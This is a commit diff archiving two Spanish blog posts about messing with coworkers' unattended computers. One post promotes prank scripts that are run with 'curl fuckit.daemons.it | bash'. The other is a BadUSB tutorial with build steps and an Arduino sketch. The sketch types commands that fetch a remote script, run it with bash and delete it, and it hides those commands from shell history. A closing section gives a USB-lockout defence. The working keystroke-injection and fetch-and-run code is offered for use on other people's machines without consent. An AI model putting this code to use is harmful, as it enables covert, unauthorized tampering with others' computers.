drymer
/
BadDaemons
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Archive published articles

This commit is contained in:
drymer 2019-01-01 01:50:25 +01:00
parent 992d581473
commit d7deb28dc4
Signed by: drymer
GPG Key ID: A307D64D5DDFDAAD
1 changed files with 193 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

194
content-org/articulos_archive.org
View File

@ -6386,7 +6386,6 @@ El repositorio git del blog es público, y se puede ver [[https://git.daemons.it
- [[https://labrecha.digital/blog/integracion-continua-drone/][Empezar con Integración Continua]]
* DONE Como hacer imágenes de docker lo mas pequeñas posibles :docker:
CLOSED: [2018-09-02 dom 20:03]
:PROPERTIES:
@ -6500,3 +6499,196 @@ Una forma de obligarme a tener limpio el wallabag con todo lo que leo es publica
Referencias:
- [[https://praxis.fortelabs.co/the-secret-power-of-read-it-later-apps-6c75cc37ef42/][The Secret Power of Read It Later Apps]]
* DONE Como joder ordenadores sin vigilancia :badusb:
CLOSED: [2018-11-05 lun 20:59]
:PROPERTIES:
:EXPORT_FILE_NAME: como-joder-a-tus-compañeros
:END:
Les desarrolladores tienen la excusa de "está compilando" para perder el tiempo en chorradas, les sysadmin ahora tenemos el "el pipeline se está ejecutando". Por ello, a veces me encuentro con tiempos muertos y me da por pensar como joder a les compañeros de trabajo que se dejan el ordenador desbloqueado.
Cuando me encontraba uno lo que hacia era ponerle un par de alias tontos, en el momento no daba la cabeza para mucho más. Así que en los tiempos muertos, como ejercicio, empecé a apuntar las cosas que se me ocurrían, luego me puse a buscar y fuí comentando con un compañero. Y así se ha creado el proyecto =fuckit=.
Este [[https://git.daemons.it/drymer/fuckit][repositorio git]] acepta sugerencias y PR. Los scripts que hay en el momento:
- Añaden tiempo de arranque a la terminal
- Destrozan el stdout con =/etc/urandom=
- Meten alias absurdos
- Cambian el fondo de pantalla
- ...
Algunos son sutiles y otros son una patada en la cara.
Este repositorio, además, se puede usar en el sub-dominio [[http://fuckit.daemons.it][fuckit.daemons.it]]. Este sub-dominio por defecto sirve el script =shuffle.sh=. Este script lo que hace es lanzar una petición a [[http://fuckit.daemons.it/all][fuckit.daemons.it/all/]], escoger un script aleatoriamente y ejecutarlo.
La forma más simple de usarlo es la siguiente:
#+BEGIN_SRC bash
curl fuckit.daemons.it | bash
#+END_SRC
Y se pueden listar todos los scripts así:
#+BEGIN_SRC bash
curl fuckit.daemons.it/all/
#+END_SRC
Y ale, a abusar.
* DONE BadUsb para joder ordenadores sin vigilancia (más rápido) :badusb:
CLOSED: [2018-11-11 dom 13:51]
:PROPERTIES:
:EXPORT_FILE_NAME: badusb-para-joder-ordenadores-sin-vigilancia-rapidamente
:END:
Seguimos en la linea de joder a la gente cercana. BadUsb es el nombre que se le da a un tipo de ataque en el que una placa, en apariencia un pendrive, se comporta como un teclado.
*TL;DR*
Para tener un equivalente al Rubber Ducky, compra una placa ATMEGA 32U4, enchúfala y ejecuta lo siguiente:
#+BEGIN_SRC bash
wget https://downloads.arduino.cc/arduino-1.8.7-linux64.tar.xz -O /tmp/arduino.tar.xz
cd /opt/
tar xvf /tmp/arduino.tar.xz
cd ~/
git clone https://git.daemons.it/drymer/badusb --recursive
cd badusb/ducky_interpreter/ducky_interpreter
sudo apt install arduino-mk
export ARDUINO_DIR=/opt/arduino-1.8.7
make -k upload
#+END_SRC
Mete algún payload de [[https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads][estos]] en la SD y ale.
*END*
Antes de ver como usarlo, veamos por que es tan jodido este ataque con un poco de contexto. Los USB están en casi todos los dispositivos, ya que son muy barato de implementar y permiten hacer accesible al dispositivo todo tipo de periféricos, como cámaras, almacenamiento o adaptadores de red. Los periféricos USB se pueden ver como ordenadores pequeñitos que tienen un microprocesador que ejecuta el código embebido del firmware del dispositivo. Este procesador actúa como un puente entre el USB y el resto de periféricos y determina como se comporta. Hay controladoras que pueden, literalmente, comportarse como una cámara, almacenamiento *y* adaptador de red, todo en un dispositivo. Para permitir actualizaciones y arreglar bugs de estos dispositivos, el firmware de algunos periféricos puede ser cambiado. Esto es muy práctico, sobretodo teniendo en cuenta el uso que le damos a los USB, pero es precisamente este el origen del problema, ya que el código que tienen los USB no está firmado. Esto quiere decir que un ordenador no tiene forma de saber si el teclado que han enchufado es realmente el teclado que tiene que ser y no un ratón o una cámara.
Visto el problema que supone, veamos como aprovecharlo y luego veremos como evitarlo. Lo primero es tener un cacharro físico que puedas usar. Hay distintas variantes, como Teensy, pero el que veremos es el Arduino Leonardo. El más conocido de este tipo es el [[https://shop.hak5.org/products/usb-rubber-ducky-deluxe][Rubber Ducky]], pero cuesta 45$, pero por suerte hay versiones más baratas. El nombre de la placa es ATMEGA 32U4, por lo que en teoría, cualquier plaquita con ese nombre debería valer. Yo he probado los siguientes:
#+DOWNLOADED: https://thehackerway.files.wordpress.com/2017/09/foto2.jpg @ 2018-11-03 21:29:37
#+attr_html: :width 750px
[[/img/foto2_2018-11-03_21-29-37.jpg]]
#+DOWNLOADED: https://thehackerway.files.wordpress.com/2017/09/foto7.jpg @ 2018-11-03 21:29:43
#+attr_html: :width 750px
[[/img/foto7_2018-11-03_21-29-43.jpg]]
El primero es el más parecido al Rubber Ducky. Tiene la ventaja de tener una SD, lo que quiere decir que flasheando el sketch[fn:1] apropiado, podemos crear scripts en el lenguaje de Rubber Ducky y usarlo sin tener que estar reflasheandolo, solo cambiando los scripts en la SD. La ventaja del segundo es que no parece tan sospechoso, tiene pinta de ser un pendrive normal y corriente. Lo malo es que cada modificación del código implica un reflasheo. Ambos se pueden encontrar en las horribles grandes superficies que son Amazon o AliExpress.
Suponiendo que tengamos una plaquita, lo que hará falta para poder flashear el pendrive es tener instalado el IDE de Arduino y un programa llamado Arduino Makefile. El IDE de Arduino se puede descargar desde [[https://www.arduino.cc/en/Main/Software][aquí]]. No hace falta usar este engendro de IDE, solo necesitamos que esté instalado. Cuando empecé a indagar sobre estas plaquitas lo que más me llamó la atención fue lo poco reproducibles que eran todos los manuales y articulos que encontré. En todos usaban el IDE a pelo, que tiene botoncitos para compilar y flashear el programa. Por suerte encontré el programa que ya mencioné, [[https://github.com/sudar/Arduino-Makefile][Arduino Makefile]]. Permite usar ficheros =Makefile= para compilar y flashear, lo que hace los sketches mucho más reproducibles, en mi opinión algo mucho más práctico. Instalarlo en Debian Estable es tan fácil como ejecutar =apt install arduino-mk=. Para todos los demás SO recomiendo echarle un ojo al repositorio del proyecto, enlazado más arriba. Una vez instalado, recomiendo setear la variable =ARDUINO_DIR= a la ruta del IDE (descomprimido) en el =~/.zshrc= o =~/.bashrc= o lo que sea que se use.
Una vez hecho, podemos ir al lío. Para aprender como funciona todo, usaremos el repositorio [[https://git.daemons.it/drymer/badusb][BadUsb]] de mi git. En el momento de escribir el articulo, hay dos directorios. Uno es el =ducky_interpreter= y el otro =fuckit=. Lo primero es clonarlo de forma recursiva, ya que usa submódulos:
#+BEGIN_SRC bash
git clone https://git.daemons.it/drymer/badusb --recursive
#+END_SRC
Empecemos por el primer proyecto, =ducky_interpreter=. Este programa no lo hice yo, lo hizo [[https://github.com/ernesto-xload][Xload]]. Lo que si hice yo fue añadirle soporte para [[https://github.com/ernesto-xload/ducky_interpreter/pull/7][arduino-mk]]. Viendo que no habia actividad nueva en el repositorio, confiaba poco en que se mergease, pero no solo se ha mergeado sino que además lo hizo en menos de un día, algo que es muy de agradecer.
Ducky interpreter es un programa que emula el comportamiento del Rubber Ducky, es decir, funciona leyendo un fichero de la SD llamado =script.txt= con un contenido similar a este:
#+BEGIN_SRC text
DELAY 3000
GUI
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 750
STRING Hello World!!!
ENTER
#+END_SRC
Si sabes inglés, será fácil de entender. El =DELAY= lo que hace es esperar los milisegundos que le digas, =GUI= es lo mismo que presionar el botón de windows, =STRING= sirve para escribir normalmente con el teclado y =ENTER= sirve para presionar enter. Las instrucciones para flashear el pendrive son las siguientes:
#+BEGIN_SRC bash
# Suponiendo que estamos en el repositorio badusb y que se ha clonado recursivamente
cd ducky_interpreter/ducky_interpreter/
# Compilar el binario
make
# Compilar y flashear. El anterior paso no es necesario, pero no sobra
make -k upload
#+END_SRC
Lo único que hará falta es formatear la SD en fat32 y escribir algún script.
Este seria el proceso si tuviésemos el BadUsb con SD, si por lo contrario teneis el que no la tiene, quiere decir que tendréis que picar el programa que queréis que ejecute. Veamos un ejemplo simple como es =fuckit=. En el [[/posts/como-joder-ordenadores-sin-vigilancia/][anterior articulo]] hablaba de como joder a tus compis de trabajo ejecutando un script que se aloja en [[http://fuckit.daemons.it][fuckit.daemons.it]]. El sketch de fuckit hace precisamente esto. En el momento de escribir el articulo, el código tiene esta pinta:
#+BEGIN_SRC c
#include "Keyboard.h"
void setup() {
Keyboard.begin();
}
void loop() {
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.releaseAll();
delay(1200);
Keyboard.print("terminal");
delay(1200);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(1200);
Keyboard.println(" wget fuckit.daemons.it");
Keyboard.println(" bash index.html");
Keyboard.println(" rm index.html");
Keyboard.println(" exit");
delay(1200);
while(1);
}
#+END_SRC
Una vez más, si sabes algo de inglés serás capaz de entender casi todo el programa. No entraré en detalles ya que en las referencias hay un enlace que explica todas las funciones disponibles de la librería =Keyboard=. El programa lo que hace es presionar el botón de Windows, escribir =terminal=, presionar enter, descargar el script de [[http://fuckit.daemons.it][fuckit.daemons.it]] con =wget=, lo ejecuta, lo borra y sale de la terminal. Además, si os fijáis, delante de cada orden hay un espacio. Esto es voluntario, sirve para evitar que estas ordenes no se registren en el histórico de la shell, que en =bash= es el fichero =~/.bash_history=. Se compila y sube de la misma forma que todos los sketch, ejecutando =make -k upload=.
La parte más compleja de este tipo de los sketches que necesitan una terminal como abrirla. Esto es debido a que no todos los escritorios tienen el mismo programa de terminal. Yo uso =termite=, pero en kde se usa =konsole=, en gnome, unity o XFCE =gnome-terminal= y en LXDE =qt-terminal=, y estos solo son los escritorios más conocidos. Pero por suerte estos escritorios, que se puede decir tranquilamente que conforman más del 90% de los escritorios que nos podemos encontrar, tienen en común que al presionar el botón de Windows se abre un dashboard que intenta facilitarte la vida al llamar a otros programas. Es por ello que con escribir =terminal= en este dashboard tenemos lo suficiente para lanzar el programa de terminal de ese escritorio.
Ya solo nos queda ver como protegernos de este ataque. La forma más simple que he encontrado en este [[https://github.com/cryptolok/USBlok][repositorio]]. Consiste en bloquear el procesamiento de cualquier USB y habilitándolo temporalmente de forma manual. Esto es incómodo al principio, pero te acostumbras rápido. Lo primero que habría que hacer es crear el fichero =/etc/cron.d/usblock= con el siguiente contenido:
#+BEGIN_SRC bash
@reboot echo 0 > /sys/bus/usb/drivers_autoprobe
#+END_SRC
De esta forma, con cada reinicio desactivaremos el procesamiento de USBs. Luego crearemos en el =$PATH= el siguiente script (basado en el repositorio que he comentado más arriba, con alguna mejora):
#+BEGIN_SRC bash
#!/usr/bin/env sh
# Source: https://github.com/cryptolok/USBlok
# usb ports switch to protect from badUSB and RubberDucky
if [ $1 ]
then
time=$1
else
time=10
fi
BUS=/sys/bus/usb/drivers_autoprobe
echo 1 | sudo tee $BUS > /dev/null
echo "Usb unlocked for $time seconds"
sleep $time
echo 0 | sudo tee $BUS > /dev/null
echo "Usb blocked"
#+END_SRC
Este script lo que hace es permitir que durante 10 segundos por defecto (o los que le pases como primer argumento) procese cualquier USB que se enchufe se procese de forma normal. Una vez pasado ese tiempo, se vuelve a bloquear el procesamiento.
Y hasta aquí llegamos. Las ideas y el código son bienvenidos, como siempre, hay que poblar el repositorio de sketches divertidos.
Tanto para el articulo como para aprender como iba todo, he usado los siguientes recursos:
- https://github.com/sudar/Arduino-Makefile
- https://github.com/cryptolok/USBlok
- https://github.com/hak5darren/USB-Rubber-Ducky/
- https://github.com/joelsernamoreno/badusb_examples/
- http://infothreat.org/bad-badusb-really/
- https://vogelchr.blogspot.com/2014/08/controlling-usb-device-access-on-linux.html
- https://thehackerway.com/2017/09/05/vuelve-el-patito-low-cost-ahora-grazna-como-un-usb-rubber-ducky-original/
- https://www.arduino.cc/reference/en/language/functions/usb/keyboard/
[fn:1] Sketch es como se llaman los programas de Arduino.